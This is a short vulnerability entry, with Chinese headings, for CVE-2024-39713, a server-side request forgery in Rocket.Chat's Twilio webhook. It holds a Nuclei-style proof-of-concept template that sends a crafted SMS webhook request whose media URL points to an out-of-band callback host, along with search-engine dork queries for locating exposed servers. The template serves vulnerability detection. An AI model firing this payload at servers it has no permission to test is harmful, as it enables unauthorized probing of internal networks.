漏洞描述
A Server-Side Request Forgery (SSRF) affects Rocket.Chat's Twilio webhook endpoint before version 6.10.1.
CVE-2024-39713: Rocket.Chat - Server-Side Request Forgery (SSRF)
PoC代码[已公开]
id: CVE-2024-39713
info:
name: Rocket.Chat - Server-Side Request Forgery (SSRF)
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
A Server-Side Request Forgery (SSRF) affects Rocket.Chat's Twilio webhook endpoint before version 6.10.1.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-39713
- https://hackerone.com/reports/1886954
- https://github.com/fkie-cad/nvd-json-data-feeds
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2024-39713
cwe-id: CWE-918
epss-score: 0.87214
epss-percentile: 0.99414
cpe: cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:*
metadata:
vendor: rocket.chat
product: rocket.chat
shodan-query: http.title:"rocket.chat"
fofa-query: title="rocket.chat"
google-query: intitle:"rocket.chat"
tags: cve,cve2024,hackerone,ssrf,oast,rocket-chat,vkev
http:
- raw:
- |
POST /api/v1/livechat/sms-incoming/twilio HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"From": "5551123456782",
"To": "5551987654323",
"Body": "SMS message",
"NumMedia": 1,
"MediaUrl0":"http://{{interactsh-url}}",
"MediaContentType0":"application/json"
}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<Response></Response>"
- type: word
part: content_type
words:
- "text/xml"
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
# digest: 490a00463044022033f051499ec2e6c02f00708892f8c9cc1d056ca6264f60e6371c531a47bf80be022035d74ae988bcd95b16513646ff37233c6788ce2e73741c7726ffb73eeae2183a:922c64590222798bb761d5b6d8e72950